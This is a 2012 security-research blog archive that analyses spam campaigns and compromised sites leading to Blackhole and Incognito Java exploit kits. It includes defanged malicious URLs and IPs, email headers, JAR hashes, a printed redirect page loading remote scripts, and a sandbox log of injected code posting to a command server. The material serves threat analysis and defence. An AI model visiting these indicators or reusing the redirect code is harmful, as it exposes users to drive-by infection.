Tag Archives: exploit kit

WordPress-how-to-videos(dot)com Spreads Java Exploits

When we analyzed few Twitter followers in one of our websites, we noted that there was an user that was following us, see the image:

We have analyzed the website (infected):

www (dot) wordpress-how-to-videos (dot) com

The website wordpress-how-to-videos(dot)com is hosted at BSE Software GmbH and its current IP address is 82.220.34.22 (330.hostserv.eu). The server machine is located in Switzerland (CH) and in the same server there are hosted other 0 websites. The domain is registered with the suffix COM and the keyword of the domain is wordpress-how-to-videos. The organization is hosttech GmbH.

The above website is used to redirect users to a malicious URL that tries to exploit the user’s browser with a Java exploit, as you can see from this image:

Java Exploit

The malicious redirect is activated only if the user browse the malicious website with a referer that contains the string of search engines, such as Google. Using the free service HTML Sniffer we can simulate the Google referer and we can see that we are redirected to the exploit URL:

The exploit URL seems to be updated very frequently:

garliccommercial .ru /pavilion?8
midwaydance .ru /pavilion?8

Both malicious URLs are hosted in this IP address:

206.53.52 .13

The Java exploit is loaded from another malicious URL:

ypcbpukqt. lflinkup .com /PJeHubmUDaovPDRCJxGMEzlYXdvvppcg

Pay attention when clicking on websites of your Twitter followers!

Amazon.com Order Confirmation leads to Blackhole Exploit Kit

We received few emails with subject:

Amazon.com Order Confirmation

Inside the email message there is a HREF link that redirects users to a malicious web page containing malicious javascript code used to redirect users to the main URL of Blackhole exploit kit:

Amazon.com fake order page

The Blackhole exploit kit URL is:

GET /main.php?page=017f3bb5c2be6a41 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: adnroidsoft .net

Fortunately the domain is not anymore active.

Spam “Your Bill Me Later notice” leads to Incognito exploit kit

Users have reported another malicious email message with subject “Your Bill Me Later notice” that states you have made a payment over the phone of $60.12 to Bill Me Later website. The email body is full of HREF links that point to a lot of malicious URLs, view a screenshot of the email message:

Your Bill Me Later notice

Email header details:

Received: from server.serverhk.net (69-164-193-60.magicnic.com [69.164.193.60])
Received: from [200.76.191.2] (helo=askokay.com) by server.serverhk.net with esmtpsa
Received: from [192.245.26.33] by m1.gns.snv.thisdomainl.com with SMTP; Wed, 16 May 2012 21:04:47 +1000
Received: from [68.117.211.36] by mailout.endmonthnow.com with NNFMP; Wed, 16 May 2012 20:54:02 +1000
Date: Wed, 16 May 2012 20:50:24 +1000
From: "Advera" askokay@askokay.com
Subject: Your Bill Me Later notice

The malicious extracted URLs are:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
hxxp:// www. studiobarsotti .it /3oXGcu61/index.html
hxxp:// www. eventosabsolue .com /qh8xhoi8/index.html
hxxp:// foxpublicidade .com .br /foRzthoD/index.html
hxxp:// www. studiobarsotti .it /GRYYEt3L/index.html
hxxp:// 76.12.158 .176 /3oXGcu61/index.html
hxxp:// 76.12.158 .176 /yWyXU9NU/index.html
hxxp:// www. eventosabsolue .com /ZmUaukzG/index.html
hxxp:// ewaleczek. cal24 .pl /5CY4dSwa/index.html
hxxp:// www. eventosabsolue .com /h03NraKE/index.html
hxxp:// foxpublicidade. com .br/yWyXU9NU/index.html
hxxp:// www. hso. co. jp/yWyXU9NU/index.html
hxxp:// zajacpiotr. hostit .pl /yWyXU9NU/index.html
hxxp:// zajacpiotr. hostit. pl /smWHegmd/index.html
hxxp:// ftp.joblines .sk /ri8ZKUip/index.html
hxxp:// www. sacmilani. com. ar /uvoNJPhk/index.html
hxxp:// foxpublicidade. com. br /smWHegmd/index.html
hxxp:// www. studiobarsotti .it /hTVbWtV1/index.html
hxxp:// jahu. com. br /FW3s2g0r/index.html
hxxp:// onecursos .com .br /foRzthoD/index.html
hxxp:// www. studiobarsotti .it /GRYYEt3L/index.html
hxxp:// www. studiobarsotti .it /yWyXU9NU/index.html
hxxp:// www. kayafamily .it /ZmUaukzG/index.html

Using URL Dump we can dump the HTML content:

Dumped HTML Content

From the dumped data, we can see it is the Incognito exploit kit.

Extacted malicious URLs:

hxxp:// bigdeal . my/ZyYJZ7F0/js.js

The malicious URLs redirect users to another malicious URL:

hxxp:// 69.163.34. 134 /showthread.php?t=977334ca118fcb8c

If we use URL Dump and we set the user-agent to Java, when we dump the content of the new malicious URL we can see it recognises from the user-agent that the user is using Java and the exploit tries to serve the infected Java applet:

Dumped Data

Link LinkedIn Mail leads to Incognito exploit kit

We have logged a new email that looks like to be sent by LinedIn:

Scam Email

The email header info shows it is a scam:

Received: from lhost10.forahost.net (server-178.211.48.24.as42926.net [178.211.48.24])
Received: from c9069568.static.spo.virtua.com.br ([201.6.149.104]:49583 helo=fixnot.com.tr) by lhost10.forahost.net
Date: Fri, 04 May 2012 08:34:11 -0700
From: "Order" @fixnot.com.tr
Subject: Link LinkedIn Mail

The email body contains also few malicious links:

hxxp:// gopeshmathur .com/ZgUBqavg/index.html

The dumped content of the URL is clear a Incognito exploit kit:

Incognito exploit kit URLs

All the new malicious links are still alive and they redirect users to:

Incognito exploit kit

The Java exploit JAR files are downloaded from:

hxxp:// 50.116.8. 93 /data/Pol.jar
hxxp:// 69.163.34 .114 /data/Pol.jar
File: Pol.jar
Size: 15404 bytes
MD5: 020B0B477706596E71DE25286ED77991
SHA1: C196A7B07BFE3D3593E93F7D98E910FA8E63AFF6
SHA256: F76AC6983135C7A69B5F07BC762F1AA478E2D49489090AC66882BC8065D1862B
SHA384: 9C6BF2971E1F86588A9A08A3F18C096FBC62A42CE6927E0A7D0AFDB56DA01DBC4A6F72F742CC62B510FC1085221753D5
SHA512: 5464424E028620C4821B740B89787C7A75E6A56401F98BD15BA94F1A9268D54411E41E97DAE86468F4BDA54160A023DCC45F134E97BC6655E31C9274F8A21FC0

The JAR file exploits the vulnerability in the Java Runtime Environment component of Oracle Java SE (CVE-2012-0507), more details from the oracle.com website:

Vulnerability in the Java Runtime Environment component of Oracle Java SE (subcomponent: Concurrency). Supported versions that are affected are 7 Update 2 and before, 6 Update 30 and before and 5.0 Update 33 and before. Easily exploitable vulnerability allows successful unauthenticated network attacks via multiple protocols. Successful attack of this vulnerability can result in unauthorized update, insert or delete access to some Java Runtime Environment accessible data as well as read access to a subset of Java Runtime Environment accessible data and ability to cause a partial denial of service (partial DOS) of Java Runtime Environment.

Other malicious Incognito exploit kit URLs:

hxxp:// ftp.coden .com .br /BhxC8VrP/index.html
hxxp:// generalcontractorsnc .com/nUUyHyvy/index.html
hxxp:// mccgedvalenca .com .br/JFs10e34/index.html
hxxp:// radiooisvira .com /mRpNLgWY/index.html
hxxp:// statisticsolympiad .org /gR2aietM/index.html

URLVoid scan reports:

http://www.urlvoid.com/scan/gopeshmathur .com
http://www.urlvoid.com/scan/jombangit .com
http://www.urlvoid.com/scan/shahinvestment .com
http://www.urlvoid.com/scan/mazyamana .com
http://www.ipvoid.com/scan/72.5.102.224
http://www.urlvoid.com/scan/ftp.coden .com .br
http://www.urlvoid.com/scan/generalcontractorsnc .com
http://www.urlvoid.com/scan/mccgedvalenca .com .br
http://www.urlvoid.com/scan/statisticsolympiad .org
http://www.urlvoid.com/scan/radiooisvira .com

Spam “Your updated information is necessary” leads to Blackhole Exploit Kit

We have received various spam emails that simulate messages from Better Business Bureau (BBB), but in real are used to spread malicious links that leads to Blackhole Exploit Kit. The subject of the emails looks like this:

Your updated information is necessary

A screenshot of the email:

Image

Other details of the emails:

Return-Path: <top-team3@ms16.hinet.net>
Received: from msr6.hinet.net (msr6.hinet.net [168.95.4.106])
Received: from ms16.hinet.net ([178.206.55.126])
Date: Thu, 26 Jan 2012 22:49:15 +1000
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.2.7) Gecko/20100713 Lightning/1.0b2 Thunderbird/3.1.1
Subject: Your updated information is necessary

The link present in the email:

hxxp://app.alaskaoregonwe sternwashington.bbb.org/sbq

Redirects users to the malicious link:

hxxp://circutor .com/4ethe8ep/index.html

The dumped content of the malicious link is:

<html>
<h1>WAIT PLEASE</h1>
 <h3>Loading...</h3>
 <script type="text/javascript" src="hxxp://diamondservice.com .au/B0bifDVW/js.js"></script>
<script type="text/javascript" src="hxxp://therefugees.altervista .org/wqWcKZ8w/js.js"></script>
<script type="text/javascript" src="hxxp://www.rentacandle.com .au/4SvXUuz4/js.js"></script>
 
</html>

Extracted malicious links (active as of now) that lead to Blackhole Exploit Kit are:

hxxp://diamondservice.com .au/B0bifDVW/js.js
hxxp://www.rentacandle.com .au/4SvXUuz4/js.js

We have analyzed the malicious link with our sandbox, and this is the report:

Connection Established - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - TCP - 213.229.188.210 - 80
Web Request - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - GET - circutor .com - /4ethe8ep/index.html
Connection Established - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - TCP - 203.210.112.33 - 80
Web Request - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - GET - diamondservice .com.au - /B0bifDVW/js.js
File Created - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - %InternetCache%\Content.IE5\8YPELNXD\js[1].js - 7A6BC5BCB465D4C54CA3D185FD5D45F0 - 75 bytes - attr: [] - -
Connection Established - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - TCP - 50.116.33.235 - 80
Web Request - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - GET - matorbaron .com - /search.php?page=ac2393a35636dfa1
File Created - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - %InternetCache%\Content.IE5\VBPHH91D\search[1].htm - D2EE09D5DBE3B22B66CFF67B81999E55 - 2048 bytes - attr: [] - -
Connection Established - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - TCP - 65.55.13.243 - 80
Web Request - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - POST - activex.microsoft .com - /objects/ocget.dll
Directory Created - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - %AppData%\Adobe
Directory Created - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - %AppData%\Adobe\Flash Player
Directory Created - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - %AppData%\Adobe\Flash Player\AssetCache
Directory Created - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - %AppData%\Adobe\Flash Player\AssetCache\N6MCDZF7
File Modified - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - %AppData%\LOCALS~1\Temp\java_install_reg.log
File Created - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - %Temp%\hsperfdata_%UserName%\856 - NOTHING TO HASH - 0 bytes - attr: [] - -
File Created - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - %AppData%\Sun\Java\Deployment\deployment.properties - 2EDE01E8DF28D3DC2BF961089BC9A241 - 635 bytes - attr: [] - -
Connection Established - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - TCP - 64.4.52.169 - 80
Process Created - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - %ProgramFiles%\Java\jre6\bin\java.exe - Sun Microsystems, Inc. - D600A0D8FACA5158CA8B221006997808 - 144792 bytes
Web Request - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - POST - codecs.microsoft .com - /isapi/ocget.dll
File Created - %ProgramFiles%\Java\jre6\bin\java.exe - %Temp%\hsperfdata_%UserName%\2016 - NOTHING TO HASH - 0 bytes - attr: [] - -
File Modified - %ProgramFiles%\Java\jre6\bin\java.exe - %AppData%\LOCALS~1\Temp\java_install_reg.log
File Created - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - %InternetCache%\Content.IE5\Q96OL02U\CAWNUS4D.HTM - CE9C2ED4F9D2B2AABE2F39FFBBB4D585 - 1176 bytes - attr: [] - -
File Created - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - %InternetCache%\Content.IE5\Q96OL02U\CAWNUS4D.HTM - CE9C2ED4F9D2B2AABE2F39FFBBB4D585 - 1176 bytes - attr: [-normal] - -
Directory Created - %ProgramFiles%\Java\jre6\bin\java.exe - C:\WINDOWS\Sun
Directory Created - %ProgramFiles%\Java\jre6\bin\java.exe - C:\WINDOWS\Sun\Java
Directory Created - %ProgramFiles%\Java\jre6\bin\java.exe - C:\WINDOWS\Sun\Java\Deployment
Directory Created - %ProgramFiles%\Java\jre6\bin\java.exe - %AppData%\Sun\Java\Deployment\log
Directory Created - %ProgramFiles%\Java\jre6\bin\java.exe - %AppData%\Sun\Java\Deployment\security
Directory Created - %ProgramFiles%\Java\jre6\bin\java.exe - %AppData%\Sun\Java\Deployment\ext
Directory Created - %ProgramFiles%\Java\jre6\bin\java.exe - %AppData%\Sun\Java\Deployment\cache\6.0\tmp
File Created - %ProgramFiles%\Java\jre6\bin\java.exe - %AppData%\Sun\Java\Deployment\deployment.properties - NOTHING TO HASH - 0 bytes - attr: [] - -
Process Created - C:\WINDOWS\explorer.exe - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - Microsoft Corporation - 55794B97A7FAABD2910873C85274F409 - 93184 bytes
File Modified - %ProgramFiles%\Java\jre6\bin\java.exe - C:\WINDOWS\system32\d3d9caps.dat
File Created - %ProgramFiles%\Java\jre6\bin\java.exe - C:\WINDOWS\system32\d3d9caps.dat - C9508CA14563A81666441FF191D9BB24 - 664 bytes - attr: [] - -
Directory Created - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - %History%\History.IE5\MSHist012012010920120116\
File Deleted - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - %History%\History.IE5\MSHist012012011420120115\index.dat - 32768 bytes
Directory Removed - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - %History%\History.IE5\MSHist012012011420120115\
Directory Created - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - %History%\History.IE5\MSHist012012012820120129\
Connection Established - C:\WINDOWS\system32\wuauclt.exe - UDP - 8.8.4.4 - 53
Connection Established - C:\WINDOWS\system32\wuauclt.exe - TCP - 118.212.168.131 - 80
Web Request - C:\WINDOWS\system32\wuauclt.exe - POST - kosmovodki .ru - /statnl/image.php
Process Created - C:\WINDOWS\explorer.exe - C:\WINDOWS\system32\verclsid.exe - Microsoft Corporation - 91790D6749EBED90E2C40479C0A91879 - 28672 bytes
Directory Created - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - %AppData%\Macromedia
Directory Created - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - %AppData%\Macromedia\Flash Player
Directory Created - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - %AppData%\Macromedia\Flash Player\#SharedObjects
Directory Created - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - %AppData%\Macromedia\Flash Player\#SharedObjects\FMGLCCCK
Directory Created - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - %AppData%\Macromedia\Flash Player\macromedia.com
Directory Created - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - %AppData%\Macromedia\Flash Player\macromedia.com\support
Directory Created - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - %AppData%\Macromedia\Flash Player\macromedia.com\support\flashplayer
Directory Created - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - %AppData%\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys
File Created - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - %AppData%\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\settings.sxx - NOTHING TO HASH - 0 bytes - attr: [] - -
Web Request - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - GET - matorbaron.com - /content/field.swf
File Created - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - %InternetCache%\Content.IE5\G55SBTS1\field[1].swf - 2435793EE73EFDAF79541977B3C08EEB - 1490 bytes - attr: [] - -
Connection Established - C:\WINDOWS\explorer.exe - TCP - 127.0.0.1 - 5152
Connection Established - C:\WINDOWS\explorer.exe - TCP - 127.0.0.1 - 1079
Connection Established - C:\WINDOWS\explorer.exe - TCP - 65.55.12.249 - 80
Web Request - C:\WINDOWS\explorer.exe - GET - www.microsoft .com - /isapi/redir.dll?prd=ie&pver=6&ar=msnhome
Connection Established - C:\WINDOWS\explorer.exe - TCP - 65.55.206.209 - 80
Web Request - C:\WINDOWS\explorer.exe - GET - home.microsoft .com - /
Connection Established - C:\WINDOWS\explorer.exe - TCP - 94.245.115.205 - 80
Connection Established - %ProgramFiles%\Java\jre6\bin\java.exe - TCP - 50.116.33.235 - 80

Malicious urls extracted:

diamondservice .com.au - /B0bifDVW/js.js
matorbaron .com - /search.php?page=ac2393a35636dfa1
kosmovodki .ru - /statnl/image.php
matorbaron .com - /content/field.swf

As we can see, malicious code is injected in the system process wuauclt.exe:

Connection Established - C:\WINDOWS\system32\wuauclt.exe - UDP - 8.8.4.4 - 53
Connection Established - C:\WINDOWS\system32\wuauclt.exe - TCP - 118.212.168.131 - 80
Web Request - C:\WINDOWS\system32\wuauclt.exe - POST - kosmovodki .ru - /statnl/image.php

Blackhole exploit kit requests:

matorbaron .com - /search.php?page=ac2393a35636dfa1
matorbaron .com - /content/field.swf

Download dumped network traffic (password is urlvoid.com):

sniffed.zip / 17 KB